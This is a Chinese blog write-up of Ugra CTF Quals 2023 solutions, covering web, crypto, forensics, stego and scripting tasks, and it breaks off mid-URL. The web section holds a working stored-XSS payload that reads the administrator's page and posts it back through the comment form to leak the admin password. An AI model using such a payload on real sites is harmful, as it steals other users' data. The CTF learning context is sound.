Ugra CTF Quals 2023 | 风尘孤狼

风尘孤狼

知识型学习记录

0%

Ugra CTF Quals 2023

发表于 分类于 阅读次数: Valine:
本文字数: 32k 阅读时长 ≈ 29 分钟

image-20230115214847796

前言

国外一比赛,质量很高,学习一下,和对象一块打了半天,第69名

image-20230116105218567

WEB

Трисекция

Три, три, три — будет?..

Обновлено 14 января в 14:05: Задание немного упрощено — мы кое-что добавили.

基础web题目,考察三部分内容,robots,http头,以及源码

image-20230115125443459

image-20230115125456260

image-20230115125506897

第二部分提示是覆盖root下的robots.txt,即访问域名直接的robots.txt即可

image-20230115190212187

image-20230115190258987

得到flag

ugra_triangles_are_cool_but_triflags_are_way_cooler_a5700fd552c0

Старые добрые времена

Вася завел блог. Как полагается начинающему разработчику, написал он его с нуля. Покажите Васе, что он неправ.

Добавлено 15 января в 01:45:

Подсказка. Флаг — пароль администратора.

image-20230115231539655

一个评论系统,可以留言,XSS漏洞,利用XMLHttpRequest,模拟管理员发送贴,同时带出来admin自己这个页面的信息

<script>
var test= window.btoa(encodeURI(document.getElementsByTagName('html')[0].outerHTML));
x=new XMLHttpRequest();
x.open("POST","https://goodolddays.q.2023.ugractf.ru/y878adr0tffsr42v/post");
x.setRequestHeader("Content-type","application/x-www-form-urlencoded");
x.send('author=123&content='+test);
</script>

得到

image-20230115231659353

url解码得到password即flag

image-20230115231718783

ugra_stop_reinventing_the_wheel_8czeakgizqrd

CRYPTO

Водоворот

Это сообщение зашифровано 1337 раундами алгоритма ROT-13.

将题目附件里的内容使用rot13加密1337次,用脚本解密1337次保存一下即可

def rot13(s):
    result = ""
    # Loop over characters.
    for v in s:
        # Convert to number with ord.
        c = ord(v)
        # Shift number back or forward.
        if c >= ord('a') and c <= ord('z'):
            if c > ord('m'):
                c -= 13
            else:
                c += 13
        elif c >= ord('A') and c <= ord('Z'):
            if c > ord('M'):
                c -= 13
            else:
                c += 13
        # Append to result.
        result += chr(c)
    # Return transformation.
    return result

# 将一段话进行rot13解密1337次
s1 = open('ciphertext.txt','r')
s=s1.read()
print(s)
for i in range(1337):
    s = rot13(s)

# 保存结果
with open('result.txt', 'w') as f:
    f.write(s)

保存之后的内容如下

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean non aliquam eros. Curabitur non ullamcorper justo. Suspendisse auctor placerat accumsan. Nam vitae posuere augue. Donec sodales porta egestas. Nunc tincidunt, enim in luctus tincidunt, velit turpis tincidunt quam, sit amet vehicula mi diam nec nibh. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Phasellus venenatis a nulla eu sagittis. Nam faucibus convallis erat at iaculis. Maecenas mollis nunc quis gravida imperdiet.

Vivamus in laoreet enim. Curabitur justo mauris, gravida vel neque vitae, aliquet hendrerit augue. Aenean mi purus, fringilla ut consectetur ac, ornare ut erat. Suspendisse in justo sit amet augue suscipit hendrerit. Morbi pretium lorem quam, ut porttitor est maximus vel. Praesent quis porttitor eros, ut finibus augue. Aenean et rhoncus nisl. Nulla facilisi. Mauris sodales ipsum et turpis ullamcorper, eget facilisis ligula accumsan.

Aenean varius nisl mattis, hendrerit ligula quis, convallis lacus. Suspendisse purus sem, pulvinar ultrices luctus ut, vulputate eget nisi. Praesent bibendum rutrum hendrerit. Integer fermentum nisl eu sapien varius tincidunt ut non dolor. Mauris id lorem libero. Curabitur ullamcorper, lacus eu tristique ultricies, ligula risus pulvinar justo, nec mattis lacus lectus quis quam. Aliquam erat volutpat. Curabitur non felis enim. Fusce tincidunt, erat sit amet finibus volutpat, ligula libero finibus turpis, in ultricies mauris ante sed purus. Integer fermentum venenatis quam, molestie luctus nisl vehicula ut. Pellentesque tincidunt lectus interdum, ultrices neque vel, suscipit turpis. Pellentesque erat diam, sagittis eu lectus vitae, malesuada finibus tortor. Aenean id egestas augue, sit amet fermentum ipsum. Curabitur consectetur lacinia risus eu tempor. Vestibulum vitae nibh vel purus ultricies aliquet. Lorem ipsum dolor sit amet, consectetur adipiscing elit.

Etiam maximus, elit non varius porta, risus neque ornare nisl, ut dapibus purus eros quis magna. Donec eget erat sit amet massa malesuada feugiat id sit amet lectus. In commodo vehicula dolor, quis laoreet neque varius sit amet. Vestibulum vitae auctor nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Aenean vitae luctus turpis, vel dapibus purus. Suspendisse potenti. Pellentesque est ex, egestas in turpis non, accumsan venenatis dui. Morbi cursus lacus risus, ac congue odio porta vitae. Fusce pulvinar semper lorem, egestas iaculis lorem condimentum nec. Nullam tellus magna, dapibus quis fermentum eget, sodales vel turpis. Quisque quis dui nisi. Duis sollicitudin leo nec ultricies porttitor. Proin dapibus libero ornare magna consectetur tristique.

Donec et fringilla enim. Donec ut massa ultricies arcu venenatis ultricies. Ut ut congue eros. Maecenas ornare lobortis metus, luctus gravida ligula sodales non. Vivamus condimentum ut dui vel fringilla. Fusce ut odio sit amet nibh lacinia malesuada. Donec velit tortor, ullamcorper in erat et, cursus euismod arcu. Nam vitae justo in tortor laoreet bibendum vitae vitae enim. Sed ac ultricies turpis. Pellentesque luctus commodo molestie. Vestibulum ac pulvinar massa.

Proin nisl nulla, commodo eget vulputate eu, scelerisque in velit. Fusce elementum in augue ac blandit. Vestibulum id dictum massa. Nullam pulvinar dolor sit amet neque sodales condimentum. Mauris pulvinar fermentum leo, quis viverra nulla aliquet et. Nulla at nisi ultricies, auctor nibh a, elementum est. Suspendisse mattis pellentesque dui. Cras ullamcorper lacus ut urna feugiat laoreet congue eget lacus. Aliquam maximus arcu eu urna ornare, id bibendum purus molestie. Etiam hendrerit mollis egestas.

Curabitur sollicitudin nunc ac odio tempus, sit amet placerat tellus sodales. Pellentesque vitae tellus ac diam gravida venenatis. Fusce gravida, nulla in malesuada blandit, libero ipsum porttitor ante, eu scelerisque nunc odio quis velit. Nam sit amet enim in odio ultrices posuere. Duis iaculis consectetur dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Nulla ut risus augue. Nam consectetur interdum nisl, ut ultricies ipsum egestas sed.

Etiam eu diam at sapien tincidunt rutrum quis non est. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam bibendum dignissim purus ac placerat. Cras ullamcorper, mi egestas lacinia faucibus, turpis erat tincidunt tortor, ut volutpat turpis ex vitae dolor. Nam imperdiet dolor sit amet lorem vestibulum, eu condimentum mi iaculis. Ut viverra nisi a ultricies pretium. Maecenas cursus lacus condimentum lectus convallis scelerisque. Sed pretium enim nec ligula consequat, eu venenatis enim efficitur. Pellentesque eros turpis, semper in massa quis, blandit pretium tortor. Nam sodales dignissim accumsan. Donec vitae nulla porta, varius augue nec, aliquam neque. Donec non aliquet nisl, euismod hendrerit est. Maecenas id ultrices metus, id pharetra mauris. Phasellus ut vulputate ante, a fermentum quam.

Nam rutrum ex non sapien facilisis, id cursus ante sollicitudin. Integer fringilla ugra_double_security_for_only_50_more_bucks_o2nvw9n27bgj consequat pellentesque. Aliquam elementum, neque in euismod luctus, nisi urna dictum ante, non imperdiet dui lorem accumsan leo. Curabitur metus arcu, vestibulum eget rhoncus a, luctus id velit. Nulla egestas libero nisi, vitae dictum risus ultricies vitae. Sed sit amet iaculis lorem. Ut mi purus, porttitor at euismod sed, porta ac massa. Nulla aliquet vel felis ac mattis. Duis erat urna, consectetur id sollicitudin at, vehicula et sapien. Morbi id mauris finibus, ullamcorper sem sed, ultrices libero.

Aliquam nulla metus, mollis et ex id, suscipit eleifend nisl. Proin sagittis lacus quis sodales tincidunt. Donec aliquet leo nibh, eu vehicula risus lacinia at. Nam at interdum massa. In feugiat, libero ut dignissim fringilla, arcu felis imperdiet dolor, a commodo diam quam sed libero. Phasellus placerat, lectus et euismod tristique, dolor erat vehicula tortor, in euismod ligula neque id lectus. Pellentesque vitae interdum lectus, ac tristique erat. Duis mi risus, tristique eu turpis at, congue pharetra purus. Cras risus leo, facilisis a venenatis id, mollis vel nisl.

Phasellus vel ligula feugiat lacus faucibus posuere quis nec massa. Suspendisse ante velit, elementum at dignissim vitae, dignissim a quam. Nunc ultrices metus in neque facilisis mattis. Ut mattis arcu velit, sit amet venenatis arcu iaculis ac. Fusce tempus sed erat vitae molestie. Maecenas posuere sit amet erat nec convallis. Fusce massa erat, pretium ut pellentesque in, porttitor varius sapien. Suspendisse lacus felis, tincidunt sed velit vel, blandit sodales libero. Aenean et nisl tellus. Etiam tristique metus quis ex pharetra viverra. Fusce quis mi facilisis, rhoncus enim a, congue orci. Duis auctor eros felis, a semper mauris congue eget. Fusce vehicula cursus quam sit amet auctor. Aenean aliquam, ipsum interdum elementum tempor, ante ex lobortis ex, egestas rhoncus velit diam et velit.

Ut consectetur tempor nibh, laoreet feugiat eros facilisis vel. Vestibulum a ligula metus. Pellentesque vehicula est nulla, facilisis dignissim magna varius quis. Phasellus hendrerit egestas risus quis accumsan. Pellentesque quis vulputate mauris. Donec quis congue felis. Sed id ex nisi. Curabitur a scelerisque arcu. Ut consequat laoreet nisl, eu aliquet risus semper at. Phasellus blandit metus eget ornare euismod. Phasellus lacinia magna quis consequat dapibus. Pellentesque tincidunt eros nec metus varius, quis finibus quam tempor. In maximus pretium nunc. Praesent id eros auctor, finibus nunc sed, commodo odio. Vivamus placerat laoreet est, nec elementum odio ultricies eu. Aliquam congue sem quis porta commodo.

Vestibulum iaculis scelerisque dolor, eget eleifend tortor bibendum condimentum. Fusce suscipit mi id sodales venenatis. Mauris ac imperdiet leo. Vivamus vitae consequat mauris, in pharetra orci. Proin in nibh ligula. Integer a varius erat. Proin euismod metus massa, ultricies suscipit ex posuere mollis. Suspendisse potenti. Phasellus ut diam ipsum. Sed arcu turpis, venenatis id vulputate vitae, ultricies non massa. Donec eget magna eget elit pharetra feugiat ac eget mi. Nam scelerisque metus massa, vitae eleifend turpis maximus eu. Curabitur aliquam odio et neque facilisis venenatis vitae sit amet massa.

Sed cursus nisi eu lorem pharetra ullamcorper. Ut pulvinar, sem a eleifend ultrices, sapien tellus sagittis justo, at sollicitudin dolor neque suscipit ex. Nulla consectetur elit elit, non faucibus diam sollicitudin non. Morbi iaculis tempus enim, porta fringilla enim auctor eu. Curabitur luctus lacinia mauris, non faucibus metus tempor rutrum. Fusce at egestas ligula, ac euismod diam. In sed blandit mi. Quisque fringilla consequat tellus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Ut nec turpis elit.

Aenean luctus magna quis risus ullamcorper, at vestibulum ligula suscipit. Quisque venenatis lectus est. Duis euismod feugiat dolor vehicula consequat. Aliquam eu sapien libero. Morbi sit amet feugiat mi. Nullam sed lectus vel tellus sodales vehicula ut quis lorem. Suspendisse gravida, arcu id bibendum consequat, sapien massa tempus dui, sed vehicula ex dui nec purus. Nulla facilisi. Quisque finibus maximus placerat. Curabitur pulvinar est et gravida accumsan. Integer in hendrerit est. Nunc ac quam arcu. Aliquam erat volutpat. Mauris purus diam, consequat in velit dictum, cursus ultrices neque. Vestibulum luctus malesuada efficitur. Praesent aliquet elementum congue.

Mauris posuere posuere tortor. Etiam dictum at turpis eget iaculis. Quisque tortor ipsum, maximus et pretium ut, vehicula sed ligula. Nulla sed consequat ex, a mollis risus. Duis condimentum at urna vel fringilla. Donec varius, dolor sed interdum efficitur, orci sapien auctor turpis, consequat efficitur felis diam quis turpis. Donec laoreet, ante sed tincidunt euismod, metus tellus feugiat nulla, sed congue elit est a libero. Ut sollicitudin orci ut orci dapibus, sit amet accumsan risus luctus. Phasellus mollis lectus id mauris venenatis consequat ut sollicitudin urna. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse potenti. In feugiat volutpat interdum. Aliquam lobortis tortor est, ac imperdiet felis mollis vel. Duis neque ligula, bibendum nec auctor a, hendrerit eget ante.

Mauris in commodo diam. Donec tellus ex, ultrices ut erat sed, placerat placerat tellus. Sed leo nunc, imperdiet eget sem a, auctor imperdiet massa. Praesent vitae feugiat tellus, id molestie orci. Vivamus vitae justo metus. Quisque sit amet nisi erat. Duis auctor nisi eu tellus feugiat, vel efficitur sapien aliquet. Maecenas metus nunc, posuere sit amet vestibulum ac, dictum vel arcu. Phasellus eu tellus eu erat blandit tincidunt a eu augue. Ut ac libero pretium, egestas tellus vel, pharetra erat. Aliquam sem nibh, accumsan at consectetur non, lobortis a tortor. Maecenas rhoncus ante quam, ac vestibulum nulla luctus vitae. Cras ac risus id turpis elementum tincidunt a quis orci. Vivamus in est fringilla, varius leo eu, tempus quam. Pellentesque vitae tristique mauris.

Proin id luctus libero. Nunc fringilla interdum diam. Morbi quam libero, semper quis lacus et, bibendum mattis risus. Aliquam vitae accumsan ipsum. Integer rhoncus diam eget odio egestas volutpat. Nunc est velit, dignissim sed auctor et, venenatis eget nisl. Maecenas dictum porttitor enim. Donec eget ipsum id magna faucibus ullamcorper eget sed massa.

Etiam congue tincidunt dolor nec vestibulum. Vivamus rhoncus erat sed felis suscipit, sit amet elementum tortor bibendum. Duis accumsan fringilla turpis at aliquet. Aenean leo quam, porta vitae euismod in, malesuada et risus. Mauris ante enim, rhoncus id velit vel, posuere imperdiet leo. Pellentesque iaculis tincidunt tortor, sit amet consequat nisl sollicitudin sit amet. Ut venenatis est mi, vitae pharetra arcu tincidunt non. Morbi et egestas ex. Suspendisse tincidunt magna a lorem vulputate rhoncus.

Quisque urna felis, imperdiet quis urna a, placerat sodales libero. Curabitur eleifend luctus turpis vitae ultrices. Sed vel dapibus dui, sed tempus leo. Nullam sed turpis enim. Maecenas vel molestie augue. Suspendisse tincidunt lorem nisi, eu tincidunt elit lobortis quis. Quisque eu imperdiet lectus. Mauris porta arcu diam, et rhoncus massa euismod a. Etiam at orci odio. Nullam tincidunt vehicula erat, a bibendum risus gravida id. Fusce facilisis elit lacus, at gravida neque volutpat et. Praesent sollicitudin ut justo vel dictum. Phasellus ante lectus, vestibulum eget molestie vel, lacinia et risus. Etiam non condimentum lorem. Donec dolor dui, faucibus a enim ut, vehicula tristique purus.

得到flag

ugra_double_security_for_only_50_more_bucks_o2nvw9n27bgj

FORENSICS

Захват трафика

Нам удалось перехватить секретную передачу данных. Есть ли в ней что-то интересное?

流量分析,导出一个图片即flag

image-20230115133628036

ugra_traffic_extractor_0ae1c61ce023

STEGANO

Музыкальная пятиминутка

В конце рабочего дня — самое то!

一个音频,主要在音频上的图片上

image-20230115172318071

从ugra开始连线到最后拼一块就是flag

ugra_we_support_local_artists_f6f385

MISC

Поле для сдачи флага

А вы прочитали правила олимпиады? Тогда вы уже должны знать хотя бы один флаг.

Осталось только найти, куда же его сдать.

看规则有flag

ugra_ex4mpl3

PPC

Глубина

У каждого есть знакомый с под сотней файлов на рабочем столе. Но, оказывается, бывает и хуже…

进去之后是

image-20230115180833066

不难发现就是选有标签的一直循环下去直到结束,选错了的话就是一句话

image-20230115180907549

用我这仅有的python功底写了个脚本来跑

# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import time
import re

i=0
url = 'https://depth.q.2023.ugractf.ru/pn4p0p46xjfno0zv/scheming_viper/wireless_cottonmouth/pearl_welder/killer_filly/orange_panther/ivory_screwdriver/orbiting_weapon/urban_moose/orbiting_harp/jade_warning/warring_python/searching_song/dangerous_nomad/explosive_gazelle/dangerous_leopard/stalking_barnacle/rowdy_chain/warring_motherboard/orbiting_chef/unnecessary_elk/opal_rhythm/bad_mixer/rowdy_cornet/opal_nomad/pearl_network/revealing_network/amber_cleric/explosive_commander/rowdy_trumpet/tundra_captain/orbiting_wrench/amber_camera/revealing_weapon/diamond_cleric/flying_player/rowdy_storm/revealing_rhythm/hunting_camera/orange_wildcat/tarnished_router/unknown_pegasus/bone_fairy/unknown_weapon/agate_horse/destroyed_troll/stalking_wrench/uncanny_mermaid/draconic_lobster/nacre_cheetah/coral_door/agate_general/yellow_nomad/urban_jackal/orange_mermaid/jet_hail/draconic_pony/unnecessary_commander/tarnished_battery/rowdy_general/green_tape/rowdy_mill/orbiting_device/blue_rhythm/ruby_deer/orbiting_welder/draconic_gelding/decisive_wizard/hunting_yeti/space_mermaid/unexpected_lion/hunting_welder/covert_nomad/jet_flute/scheming_tiger/destroyed_sound/amber_mare/glass_cartridge/mountain_tuba/threatening_projector/waning_cornet/destroyed_zebra/unknown_pony/ivory_violin/scheming_grizzly/desert_clarinet/wireless_projector/draconic_horse/orange_rhythm/ruby_stallion/onyx_compressor/warring_fairy/waning_yearling/hidden_pilot/urban_rhythm/diamond_thunder/obsidian_wrench/dangerous_lathe/stalking_nomad/obsidian_memory/warring_camera/decisive_wrench/destroyed_tiger/searching_compressor/nacre_admiral/bad_unicorn/wireless_beat/desert_yeti/orange_gazelle/violet_leopard/pearl_mill/bone_elk/warring_wizard/blue_tuba/diamond_rain/ivory_stag/blue_warning/orbiting_panther/bad_flute/nacre_cottonmouth/chasing_weapon/searching_boa/opal_elk/wild_jackal/unknown_projector/jet_lion/dangerous_transistor/decisive_hammerhead/sapphire_compressor/yellow_mask/hidden_hail/scheming_admiral/space_stag/amber_wizard/jet_chain/onyx_drill/explosive_door/beryl_chain/obsidian_cyborg/orange_hail/onyx_screwdriver/space_chef/wild_tiger/emerald_drought/orange_harp/jet_cyborg/falling_stallion/ivory_hail/unexpected_cottonmouth/desert_sidewinder/green_packet/emerald_barnacle/insane_battery/urban_general/space_case/bone_guitar/bad_major/tarnished_tiger/unnecessary_memory/sapphire_stallion/yellow_lightning/emerald_cello/tundra_elk/unexpected_yeti/desert_lobster/untouchable_device/inconceivable_wizard/coral_moose/decisive_device/red_commander/draconic_guitar/glass_yeti/killer_wildcat/agate_sander/rowdy_cleric/dangerous_chef/desert_welder/chasing_mixer/tarnished_router/jade_projector/falling_drill/rowdy_vacuum/tarnished_hammer/red_elk/pearl_filly/chasing_cobra/violet_mill/unknown_filly/beryl_horn/diamond_dragon/chasing_pegasus/destroyed_rain/amber_viper/ruby_lightning/flying_yearling/beryl_horse/nacre_unicorn/covert_packet/untouchable_screwdriver/orbiting_lathe/orange_piano/nacre_admiral/blue_yearling/covert_clarinet/urban_nomad/blue_drizzle/red_drill/unknown_projector/onyx_snow/chasing_pony/scheming_robot/ruby_weapon/rowdy_router/jet_jackal/scheming_device/spinning_drum/emerald_inspector/jade_hammer/urban_network/unknown_keyboard/obsidian_display/wireless_chain/unnecessary_commander/spinning_wizard/ivory_dragon/falling_beat/green_unicorn/threatening_welder/threatening_cyborg/urban_rhythm/green_moose/falling_lion/beryl_banjo/mountain_gazelle/revealing_drill/ivory_ink/wild_sun/mountain_gazelle/glass_network/dangerous_cottonmouth/amber_mill/emerald_weapon/insane_cottonmouth/jade_wildcat/glass_griffin/deadly_ink/waning_robot/beryl_piranha/wireless_cartridge/agate_gelding/green_orca/green_trombone/violet_foal/hunting_robot/unknown_inspector/desert_welder/destroyed_lathe/opal_trombone/sapphire_stallion/explosive_clarinet/glass_wizard/waning_warning/glass_boa/bone_hammerhead/killer_cleric/agate_beat/scheming_pegasus/destroyed_robot/insane_motherboard/untouchable_lobster/chasing_cornet/hunting_mask/unexpected_motherboard/falling_octopus/spinning_ink/violet_disk/unexpected_falcon/blue_weapon/killer_keyboard/coral_compressor/untouchable_trumpet/ivory_network/ruby_rhythm/blue_cartridge/scheming_sun/unexpected_case/glass_cartridge/chasing_keyboard/scheming_projector/untouchable_welder/sapphire_crab/untouchable_flute/flying_saxophone/searching_hail/pearl_thunder/agate_horse/amber_hammer/stalking_cornet/draconic_stag/untouchable_gelding/searching_router/draconic_chef/unexpected_sun/killer_inspector/green_camera/spinning_falcon/tundra_wildcat/wild_admiral/waning_memory/wireless_inspector/falling_cup/uncanny_banjo/onyx_orca/mountain_moose/deadly_device/jade_tiger/spinning_koala/revealing_packet/nacre_android/onyx_piccolo/nacre_clarinet/killer_cougar/orange_song/unexpected_mask/space_orca/opal_motherboard/bad_projector/insane_mainframe/uncanny_unicorn/unexpected_rhythm/coral_python/untouchable_fairy/unknown_filly/amber_octopus/tarnished_deer/dangerous_mermaid/unknown_piano/pearl_mask/coral_moose/amber_storm/covert_player/jade_grizzly/diamond_troll/deadly_boa/yellow_major/revealing_major/blue_major/spinning_thunder/warring_captain/waning_player/revealing_transistor/explosive_gazelle/jade_motherboard/urban_mask/jet_yeti/orbiting_snow/bone_viper/deadly_mainframe/space_falcon/orange_falcon/space_cobra/threatening_wildcat/wireless_drum/orbiting_dragon/opal_lion/desert_sun/untouchable_trumpet/jet_chain/sapphire_zebra/tundra_mainframe/revealing_organ/beryl_koala/threatening_elk/decisive_piano/nacre_zebra/stalking_saxophone/inconceivable_harp/tundra_captain/yellow_deer/red_projector/uncanny_pilot/rowdy_guitar/tarnished_warning/flying_beat/green_trumpet/pearl_moose/revealing_moose/diamond_horn/nacre_sidewinder/orbiting_griffin/uncanny_hammerhead/covert_hail/blue_foal/emerald_chef/explosive_gazelle/desert_robot/rowdy_lion/urban_piccolo/amber_sloth/chasing_zebra/ivory_yearling/insane_filly/tundra_captain/dangerous_hammer/space_flute/space_mask/flying_crab/spinning_jackal/untouchable_compressor/tarnished_piccolo/killer_motherboard/explosive_pilot/killer_lightning/decisive_robot/chasing_cup/onyx_violin/pearl_snow/diamond_sound/glass_major/decisive_thunder/searching_vacuum/field_gelding/ruby_pony/red_thunder/emerald_griffin/flying_saxophone/mountain_leopard/waning_network/inconceivable_transistor/hidden_camera/desert_crab/desert_cheetah/rowdy_organ/blue_piranha/hunting_song/waning_hail/warring_cottonmouth/destroyed_trombone/beryl_piano/inconceivable_commander/destroyed_robot/unnecessary_piranha/revealing_banjo/tarnished_jackal/hunting_welder/hidden_organ/uncanny_inspector/pearl_major/uncanny_lion/onyx_mixer/deadly_pegasus/violet_drum/red_unicorn/coral_storm/emerald_captain/coral_zebra/revealing_rhythm/chasing_tuba/dangerous_cougar/sapphire_cobra/yellow_wildcat/stalking_welder/obsidian_keyboard/red_robot/field_cup/green_welder/deadly_griffin/hidden_lobster/unexpected_zebra/orange_cheetah/deadly_drizzle/covert_piranha/deadly_rhythm/diamond_zebra/bone_banjo/agate_captain/spinning_yeti/insane_nomad/scheming_warning/hunting_welder/urban_sander/unnecessary_wildcat/waning_warning/ruby_viper/falling_boa/nacre_mask/deadly_lathe/revealing_chain/destroyed_beat/desert_drill/warring_jackal/destroyed_koala/inconceivable_camera/ruby_lathe/hunting_foal/field_deer/agate_major/obsidian_screwdriver/violet_pegasus/untouchable_snow/untouchable_cougar/'# 获取网页


for i in range(101):
    res = requests.get(url)
    res=res.text
    if "Parent Directory" in res:
        print('傻逼玩意')
        res=res.replace('..','sb')
    print(res)
        # 解析网页
    soup = BeautifulSoup(res, 'html.parser')
        # 找到所有的a标签
    links = soup.find_all('a')
        # 遍历a标签
    for link in links:
        #print(link)

            # 获取a标签的href属性
        href = link.get('href')
            # 拼接域名
        full_url = url + href
            # 访问拼接后的url
        res = requests.get(full_url)
        print(full_url,res.text)
        #print(full_url)

        if('HREF' in res.text):
            break
            #url=full_url

        else:
            continue
    print(full_url)
    url=full_url
    print(url)
    print('找到指定路径,前往下一个')
    i+=1
    time.sleep(1)

题目描述说大概一百个,但是我貌似得跑了俩小时才跑完,远不止一百个,值得庆幸的是最后也跑出来了

他的路径我也贴一下吧

https://depth.q.2023.ugractf.ru/pn4p0p46xjfno0zv/scheming_viper/wireless_cottonmouth/pearl_welder/killer_filly/orange_panther/ivory_screwdriver/orbiting_weapon/urban_moose/orbiting_harp/jade_warning/warring_python/searching_song/dangerous_nomad/explosive_gazelle/dangerous_leopard/stalking_barnacle/rowdy_chain/warring_motherboard/orbiting_chef/unnecessary_elk/opal_rhythm/bad_mixer/rowdy_cornet/opal_nomad/pearl_network/revealing_network/amber_cleric/explosive_commander/rowdy_trumpet/tundra_captain/orbiting_wrench/amber_camera/revealing_weapon/diamond_cleric/flying_player/rowdy_storm/revealing_rhythm/hunting_camera/orange_wildcat/tarnished_router/unknown_pegasus/bone_fairy/unknown_weapon/agate_horse/destroyed_troll/stalking_wrench/uncanny_mermaid/draconic_lobster/nacre_cheetah/coral_door/agate_general/yellow_nomad/urban_jackal/orange_mermaid/jet_hail/draconic_pony/unnecessary_commander/tarnished_battery/rowdy_general/green_tape/rowdy_mill/orbiting_device/blue_rhythm/ruby_deer/orbiting_welder/draconic_gelding/decisive_wizard/hunting_yeti/space_mermaid/unexpected_lion/hunting_welder/covert_nomad/jet_flute/scheming_tiger/destroyed_sound/amber_mare/glass_cartridge/mountain_tuba/threatening_projector/waning_cornet/destroyed_zebra/unknown_pony/ivory_violin/scheming_grizzly/desert_clarinet/wireless_projector/draconic_horse/orange_rhythm/ruby_stallion/onyx_compressor/warring_fairy/waning_yearling/hidden_pilot/urban_rhythm/diamond_thunder/obsidian_wrench/dangerous_lathe/stalking_nomad/obsidian_memory/warring_camera/decisive_wrench/destroyed_tiger/searching_compressor/nacre_admiral/bad_unicorn/wireless_beat/desert_yeti/orange_gazelle/violet_leopard/pearl_mill/bone_elk/warring_wizard/blue_tuba/diamond_rain/ivory_stag/blue_warning/orbiting_panther/bad_flute/nacre_cottonmouth/chasing_weapon/searching_boa/opal_elk/wild_jackal/unknown_projector/jet_lion/dangerous_transistor/decisive_hammerhead/sapphire_compressor/yellow_mask/hidden_hail/scheming_admiral/space_stag/amber_wizard/jet_chain/onyx_drill/explosive_door/beryl_chain/obsidian_cyborg/orange_hail/onyx_screwdriver/space_chef/wild_tiger/emerald_drought/orange_harp/jet_cyborg/falling_stallion/ivory_hail/unexpected_cottonmouth/desert_sidewinder/green_packet/emerald_barnacle/insane_battery/urban_general/space_case/bone_guitar/bad_major/tarnished_tiger/unnecessary_memory/sapphire_stallion/yellow_lightning/emerald_cello/tundra_elk/unexpected_yeti/desert_lobster/untouchable_device/inconceivable_wizard/coral_moose/decisive_device/red_commander/draconic_guitar/glass_yeti/killer_wildcat/agate_sander/rowdy_cleric/dangerous_chef/desert_welder/chasing_mixer/tarnished_router/jade_projector/falling_drill/rowdy_vacuum/tarnished_hammer/red_elk/pearl_filly/chasing_cobra/violet_mill/unknown_filly/beryl_horn/diamond_dragon/chasing_pegasus/destroyed_rain/amber_viper/ruby_lightning/flying_yearling/beryl_horse/nacre_unicorn/covert_packet/untouchable_screwdriver/orbiting_lathe/orange_piano/nacre_admiral/blue_yearling/covert_clarinet/urban_nomad/blue_drizzle/red_drill/unknown_projector/onyx_snow/chasing_pony/scheming_robot/ruby_weapon/rowdy_router/jet_jackal/scheming_device/spinning_drum/emerald_inspector/jade_hammer/urban_network/unknown_keyboard/obsidian_display/wireless_chain/unnecessary_commander/spinning_wizard/ivory_dragon/falling_beat/green_unicorn/threatening_welder/threatening_cyborg/urban_rhythm/green_moose/falling_lion/beryl_banjo/mountain_gazelle/revealing_drill/ivory_ink/wild_sun/mountain_gazelle/glass_network/dangerous_cottonmouth/amber_mill/emerald_weapon/insane_cottonmouth/jade_wildcat/glass_griffin/deadly_ink/waning_robot/beryl_piranha/wireless_cartridge/agate_gelding/green_orca/green_trombone/violet_foal/hunting_robot/unknown_inspector/desert_welder/destroyed_lathe/opal_trombone/sapphire_stallion/explosive_clarinet/glass_wizard/waning_warning/glass_boa/bone_hammerhead/killer_cleric/agate_beat/scheming_pegasus/destroyed_robot/insane_motherboard/untouchable_lobster/chasing_cornet/hunting_mask/unexpected_motherboard/falling_octopus/spinning_ink/violet_disk/unexpected_falcon/blue_weapon/killer_keyboard/coral_compressor/untouchable_trumpet/ivory_network/ruby_rhythm/blue_cartridge/scheming_sun/unexpected_case/glass_cartridge/chasing_keyboard/scheming_projector/untouchable_welder/sapphire_crab/untouchable_flute/flying_saxophone/searching_hail/pearl_thunder/agate_horse/amber_hammer/stalking_cornet/draconic_stag/untouchable_gelding/searching_router/draconic_chef/unexpected_sun/killer_inspector/green_camera/spinning_falcon/tundra_wildcat/wild_admiral/waning_memory/wireless_inspector/falling_cup/uncanny_banjo/onyx_orca/mountain_moose/deadly_device/jade_tiger/spinning_koala/revealing_packet/nacre_android/onyx_piccolo/nacre_clarinet/killer_cougar/orange_song/unexpected_mask/space_orca/opal_motherboard/bad_projector/insane_mainframe/uncanny_unicorn/unexpected_rhythm/coral_python/untouchable_fairy/unknown_filly/amber_octopus/tarnished_deer/dangerous_mermaid/unknown_piano/pearl_mask/coral_moose/amber_storm/covert_player/jade_grizzly/diamond_troll/deadly_boa/yellow_major/revealing_major/blue_major/spinning_thunder/warring_captain/waning_player/revealing_transistor/explosive_gazelle/jade_motherboard/urban_mask/jet_yeti/orbiting_snow/bone_viper/deadly_mainframe/space_falcon/orange_falcon/space_cobra/threatening_wildcat/wireless_drum/orbiting_dragon/opal_lion/desert_sun/untouchable_trumpet/jet_chain/sapphire_zebra/tundra_mainframe/revealing_organ/beryl_koala/threatening_elk/decisive_piano/nacre_zebra/stalking_saxophone/inconceivable_harp/tundra_captain/yellow_deer/red_projector/uncanny_pilot/rowdy_guitar/tarnished_warning/flying_beat/green_trumpet/pearl_moose/revealing_moose/diamond_horn/nacre_sidewinder/orbiting_griffin/uncanny_hammerhead/covert_hail/blue_foal/emerald_chef/explosive_gazelle/desert_robot/rowdy_lion/urban_piccolo/amber_sloth/chasing_zebra/ivory_yearling/insane_filly/tundra_captain/dangerous_hammer/space_flute/space_mask/flying_crab/spinning_jackal/untouchable_compressor/tarnished_piccolo/killer_motherboard/explosive_pilot/killer_lightning/decisive_robot/chasing_cup/onyx_violin/pearl_snow/diamond_sound/glass_major/decisive_thunder/searching_vacuum/field_gelding/ruby_pony/red_thunder/emerald_griffin/flying_saxophone/mountain_leopard/waning_network/inconceivable_transistor/hidden_camera/desert_crab/desert_cheetah/rowdy_organ/blue_piranha/hunting_song/waning_hail/warring_cottonmouth/destroyed_trombone/beryl_piano/inconceivable_commander/destroyed_robot/unnecessary_